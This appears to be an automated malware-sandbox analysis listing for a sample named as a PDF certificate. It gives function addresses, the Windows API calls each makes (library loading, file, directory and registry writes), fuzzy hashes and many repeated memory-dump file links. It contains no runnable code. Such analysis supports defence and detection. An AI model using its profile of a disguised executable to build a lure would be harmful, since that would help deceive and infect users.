Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 56fa2814269c28ffc6cd4c46df727e5f90e38ec81a6b85d2c904a37502f98665
Instruction ID: ed958cdb0af940290ad8e224458c39a91d35accb7d2f19645d781aa9a2f92111
Opcode Fuzzy Hash: 56fa2814269c28ffc6cd4c46df727e5f90e38ec81a6b85d2c904a37502f98665
Instruction Fuzzy Hash: ECE01A72E082008FE764ABA5AA495AD77B4EB91325B20847FE211F11D1DE7858418F6A

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68

Function 00406671 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
Part of subcall function 00406601: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406667

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD

Function 00405D8D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 00405D68 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98

Function 0040584B Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 00406132 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674

Function 00405E10 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4

Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4

Function 00406104 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,Execute: ,?), ref: 00406128

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
